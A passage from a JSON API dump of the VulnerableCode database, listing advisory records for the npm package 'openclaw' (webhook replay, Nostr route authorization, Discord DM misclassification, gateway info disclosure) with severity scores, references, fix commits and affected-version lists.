"openclaw-webhook-replay-via-query-parameter-reordering-in-plivo-v3", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:20:49Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-webhook-replay-via-query-parameter-reordering-in-plivo-v3" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-41395", "GHSA-8689-gm9g-jgr6" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bzw7-yvu2-yqa2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89505?format=api", "vulnerability_id": "VCID-c25h-khws-2fc3", "summary": "OpenClaw: Nostr profile mutation routes allowed operator.write config persistence\n## Summary\n\nNostr profile mutation routes allowed operator.write config persistence.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nNostr plugin HTTP profile routes could persist profile config through a path that did not require admin authority.\n\n## Technical Details\n\nThe fix requires `operator.admin` scope for Nostr profile mutation routes.\n\n## Fix\n\nThe issue was fixed in #63553. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `6517c700de9bb0ee11b41ab625ef3b63d01b6083`\n- PR: #63553\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zpbrent and @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/63553", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/63553" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f3h5-h452-vp3j", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f3h5-h452-vp3j" }, { "reference_url": "https://github.com/advisories/GHSA-f3h5-h452-vp3j", "reference_id": "GHSA-f3h5-h452-vp3j", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f3h5-h452-vp3j" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api", "purl": "pkg:npm/openclaw@2026.4.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-q3a2-qk5j-1yat" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10" } ], "aliases": [ "GHSA-f3h5-h452-vp3j" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c25h-khws-2fc3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89835?format=api", "vulnerability_id": "VCID-c4yt-z48z-zygv", "summary": "OpenClaw: Discord Component Interaction Misclassifies Group DM as Direct Message\n## Summary\nDiscord Component Interaction Misclassifies Group DM as Direct Message\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Real on shipped v2026.3.24 component-interaction routing/auth in extensions/discord/src/monitor/agent-components-helpers.ts, but impact is limited to Group DM policy or session misclassification.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8c83128fc38d5a3642b8ccbea58550755fdbbbaf` — 2026-03-30T11:17:53-06:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @nexrin for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41341", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.051", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.05106", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.05121", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41341" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/8c83128fc38d5a3642b8ccbea58550755fdbbbaf", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:34:01Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/8c83128fc38d5a3642b8ccbea58550755fdbbbaf" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6336-qqw9-v6x6", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:34:01Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6336-qqw9-v6x6" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41341", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41341" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-component-interaction-misclassification-in-discord-extension", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:34:01Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-component-interaction-misclassification-in-discord-extension" }, { "reference_url": "https://github.com/advisories/GHSA-6336-qqw9-v6x6", "reference_id": "GHSA-6336-qqw9-v6x6", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6336-qqw9-v6x6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41341", "GHSA-6336-qqw9-v6x6" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "4.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c4yt-z48z-zygv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89511?format=api", "vulnerability_id": "VCID-c76v-4577-n7c6", "summary": "OpenClaw Has a Gateway Control Interface Information Disclosure Vulnerability\n## Summary\nOpenClaw Gateway Control Interface Information Disclosure Vulnerability\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Released Control UI bootstrap JSON did expose version and assistant agent id, but that is low-severity fingerprinting or info disclosure only; unreleased c5c10adc trims the payload.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `c5c10adc022f42eb75ebb3bf364dd607738683b3` — 2026-03-30T15:08:19+01:00\n\nOpenClaw thanks @topsec-bunney for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41335", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12878", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12844", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12883", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41335" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/c5c10adc022f42eb75ebb3bf364dd607738683b3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": 